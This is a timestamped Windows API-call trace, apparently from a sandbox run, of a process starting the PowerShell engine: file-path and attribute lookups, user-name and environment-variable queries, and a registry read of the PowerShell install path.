	[0620.285] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d4d0 | out: lpFileInformation=0x28d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0620.285] SetErrorMode (uMode=0x1) returned 0x1
	[0620.286] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.286] SetErrorMode (uMode=0x1) returned 0x1
	[0620.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d4d0 | out: lpFileInformation=0x28d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0620.286] SetErrorMode (uMode=0x1) returned 0x1
	[0620.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.286] SetErrorMode (uMode=0x1) returned 0x1
	[0620.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d4d0 | out: lpFileInformation=0x28d4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0620.286] SetErrorMode (uMode=0x1) returned 0x1
	[0620.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.287] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.287] SetErrorMode (uMode=0x1) returned 0x1
	[0620.287] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0620.287] SetErrorMode (uMode=0x1) returned 0x1
	[0620.287] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.287] SetErrorMode (uMode=0x1) returned 0x1
	[0620.287] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0620.288] SetErrorMode (uMode=0x1) returned 0x1
	[0620.288] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x28d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x28d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0620.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.288] SetErrorMode (uMode=0x1) returned 0x1
	[0620.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0620.288] SetErrorMode (uMode=0x1) returned 0x1
	[0620.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.289] SetErrorMode (uMode=0x1) returned 0x1
	[0620.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d510 | out: lpFileInformation=0x28d510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0620.289] SetErrorMode (uMode=0x1) returned 0x1
	[0620.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0620.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x28d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0621.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x28d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0621.275] SetErrorMode (uMode=0x1) returned 0x1
	[0621.275] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x28d7d0 | out: lpFileInformation=0x28d7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0621.276] SetErrorMode (uMode=0x1) returned 0x1
	[0621.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0621.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0622.247] CoTaskMemAlloc (cb=0x804) returned 0x1b901f20
	[0622.247] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b901f20, nSize=0x28db38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28db38) returned 0x1
	[0622.248] CoTaskMemFree (pv=0x1b901f20) 
	[0622.248] CoTaskMemAlloc (cb=0x204) returned 0x419ce0
	[0622.248] GetUserNameW (in: lpBuffer=0x419ce0, pcbBuffer=0x28db78 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28db78) returned 1
	[0622.249] CoTaskMemFree (pv=0x419ce0) 
	[0622.250] ReportEventW (hEventLog=0x1b760008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3583ec8*="Available", lpRawData=0x3583c58) returned 1
	[0623.193] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0623.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.193] CoTaskMemFree (pv=0x49d140) 
	[0623.194] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0623.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.195] CoTaskMemFree (pv=0x49d140) 
	[0623.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.201] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0623.202] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0623.202] CoTaskMemFree (pv=0x49d140) 
	[0623.202] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0623.202] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0623.202] CoTaskMemFree (pv=0x49d140) 
	[0623.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.204] GetCurrentProcessId () returned 0xf18
	[0623.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.209] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28db58 | out: phkResult=0x28db58*=0x394) returned 0x0
	[0623.209] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28dadc, lpData=0x0, lpcbData=0x28dad8*=0x0 | out: lpType=0x28dadc*=0x1, lpData=0x0, lpcbData=0x28dad8*=0x56) returned 0x0
	[0623.209] CoTaskMemAlloc (cb=0x5a) returned 0x1b8edbd0
	[0623.209] RegQueryValueExW (in: hKey=0x394, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28daac, lpData=0x1b8edbd0, lpcbData=0x28daa8*=0x56 | out: lpType=0x28daac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28daa8*=0x56) returned 0x0
	[0623.209] CoTaskMemFree (pv=0x1b8edbd0) 
	[0623.209] RegCloseKey (hKey=0x394) returned 0x0
	[0623.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.217] CoTaskMemAlloc (cb=0x104) returned 0x49d140
	[0623.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d140, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.217] CoTaskMemFree (pv=0x49d140) 
	[0623.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0623.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
